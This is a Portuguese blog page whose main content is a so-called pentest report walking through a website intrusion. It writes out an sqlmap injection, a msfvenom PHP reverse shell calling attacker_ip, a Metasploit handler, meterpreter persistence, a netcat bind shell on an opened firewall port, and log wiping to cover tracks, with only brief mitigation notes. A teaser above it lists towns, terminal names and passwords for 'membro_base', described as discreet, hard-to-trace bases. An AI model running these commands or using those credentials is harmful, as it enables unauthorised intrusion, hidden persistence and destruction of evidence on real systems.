Pular para o conteúdo principal

Destaques

Lista de Cidades, Terminais e Acessos

  1. Pompéu (MG) Coordenadas: -19.2256, -45.0063 Descrição: Cidade próxima à BR-352, movimentação agropecuária e logística regional. Terminal: pompeu_srv01 Usuário: membro_base Senha: Pom@2025mg! 2. Jaguaribe (CE) Coordenadas: -5.8921, -38.6219 Descrição: Ponto estratégico no Ceará pela proximidade com a BR-116 e tráfego regional. Terminal: jaguaribe_tml Usuário: membro_base Senha: Jag!Ce#442 3. Itabaianinha (SE) Coordenadas: -11.2760, -37.7874 Descrição: Interior do Sergipe com acesso facilitado pela BR-101 e região de produção agrícola. Terminal: itabaianinha_sys Usuário: membro_base Senha: Ita#Se_887 4. Joanópolis (SP) Coordenadas: -22.9275, -46.2753 Descrição: Área montanhosa no interior de SP, próxima de SP-008, ideal para refúgios e base discreta. Terminal: joanopolis_node Usuário: membro_base Senha: Joa@Sp!713 5. Itiruçu (BA) Coordenadas: -13.5297, -40.1490 Descrição: Cidade isolada com acesso pela BR-116, difícil rastreio e movimentação externa. Termi...

Relatório Técnico: Tipos de Redes, Portas Lógicas e suas Vulnerabilidades


1. Introdução

Este relatório descreve um cenário de pentest onde um site é invadido, uma backdoor é instalada para acesso remoto e uma porta secundária é explorada para manter o acesso persistente. O objetivo é identificar vulnerabilidades, demonstrar como elas podem ser exploradas e fornecer recomendações para mitigação.


2. Metodologia de Pentest

2.1. Coleta de Informações

Objetivo: Identificar o site e suas tecnologias.

Ferramentas: Nmap, WhatWeb, Wappalyzer.


Passos:

Realizar uma varredura de portas para identificar serviços ativos.

Identificar o sistema operacional e tecnologias utilizadas (ex: Apache, PHP, MySQL).


2.2. Exploração de Vulnerabilidades

Objetivo: Identificar e explorar vulnerabilidades para obter acesso inicial.

Ferramentas: Metasploit, SQLmap, Burp Suite.


Passos:

Testar vulnerabilidades comuns, como Injeção de SQL ou XSS.

Explorar a vulnerabilidade para obter acesso ao servidor.


2.3. Criação de Backdoor

Objetivo: Instalar uma backdoor para acesso remoto.

Ferramentas: Metasploit, Netcat, Shells web.


Passos:

Utilizar uma vulnerabilidade para carregar uma shell reversa.

Configurar a backdoor para persistência.


2.4. Exploração de Porta Secundária

Objetivo: Manter o acesso ao sistema através de uma porta secundária.

Ferramentas: SSH, Netcat.


Passos:

Abrir uma porta secundária no firewall.

Configurar um serviço para escutar na porta secundária.


2.5. Limpeza de Rastros

Objetivo: Remover evidências da invasão.

Ferramentas: Comandos do sistema operacional.


Passos:

Limpar logs de acesso.

Remover arquivos temporários.


3. Exemplo Prático de Pentest

3.1. Coleta de Informações

Varredura de Portas:


(nmap -sV -p- target.com)

Identifica serviços ativos e versões.

Identificação de Tecnologias:



(whatweb target.com)

Identifica o servidor web e tecnologias utilizadas.


3.2. Exploração de Vulnerabilidades

Injeção de SQL:


Utilizar o SQLmap para explorar uma vulnerabilidade de injeção de SQL.


(sqlmap -u "http://target.com/login" -- )(data="username=admin&password=pass" --dbs)

Extrair dados do banco de dados.


Upload de Arquivo Malicioso:

Explorar uma falha de upload para carregar uma shell web.



(msfvenom -p php/meterpreter/reverse_tcp LHOST=attacker_ip) (LPORT=4444 -f raw > shell.php)

Fazer upload do arquivo shell.php para o servidor.


3.3. Criação de Backdoor

Shell Reversa:


Configurar o Metasploit para receber a conexão reversa.


(msfconsole)

(use exploit/multi/handler)

(set payload php/meterpreter/reverse_tcp)

(set LHOST attacker_ip)

(set LPORT 4444)

(exploit)


Acessar o arquivo shell.php no servidor para iniciar a conexão reversa.


Persistência:

Criar um serviço para manter o acesso.

(meterpreter > run persistence -X -i 60 -p 4444 -r attacker_ip)


3.4. Exploração de Porta Secundária

Abrir Porta Secundária:

Abrir uma porta no firewall.

(iptables -A INPUT -p tcp --dport 2222 -j ACCEPT)


Configurar Serviço:

Utilizar o Netcat para escutar na porta secundária.

(nc -lvp 2222 -e /bin/bash)


3.5. Limpeza de Rastros

Limpar Logs:

(meterpreter > clearev)


Remover Arquivos Temporários:

(rm -rf /tmp/shell.php)


4. Vulnerabilidades Identificadas

4.1. Injeção de SQL

Descrição: Falha que permite a execução de comandos SQL maliciosos.

Impacto: Acesso não autorizado a dados sensíveis.


4.2. Upload de Arquivo Malicioso

Descrição: Falha que permite o upload de arquivos maliciosos.

Impacto: Execução de código malicioso no servidor.


4.3. Falhas de Configuração de Firewall

Descrição: Configurações inadequadas de firewall.

Impacto: Acesso não autorizado através de portas secundárias.


5. Recomendações de Mitigação

5.1. Validação de Entradas

Validar e sanitizar todas as entradas de usuário.

5.2. Restrição de Uploads

Validar e restringir tipos de arquivos permitidos.

5.3. Configuração Adequada de Firewall

Configurar o firewall para bloquear portas desnecessárias.

5.4. Monitoramento de Logs

Monitorar logs de acesso para detectar atividades suspeitas.

5.5. Atualização de Software

Manter o software e bibliotecas atualizados.


6. Conclusão

Este relatório demonstrou como um site pode ser invadido, uma backdoor pode ser instalada e uma porta secundária pode ser explorada para manter o acesso persistente. A identificação e correção dessas vulnerabilidades são essenciais para proteger os sites e os dados dos usuários. Recomenda-se a implementação de práticas de segurança robustas, como validação de entradas, restrição de uploads e configuração adequada de firewalls.


Copyright © 2025 (@zxyurikauan). Todos os direitos reservados 


Comentários

Postagens mais visitadas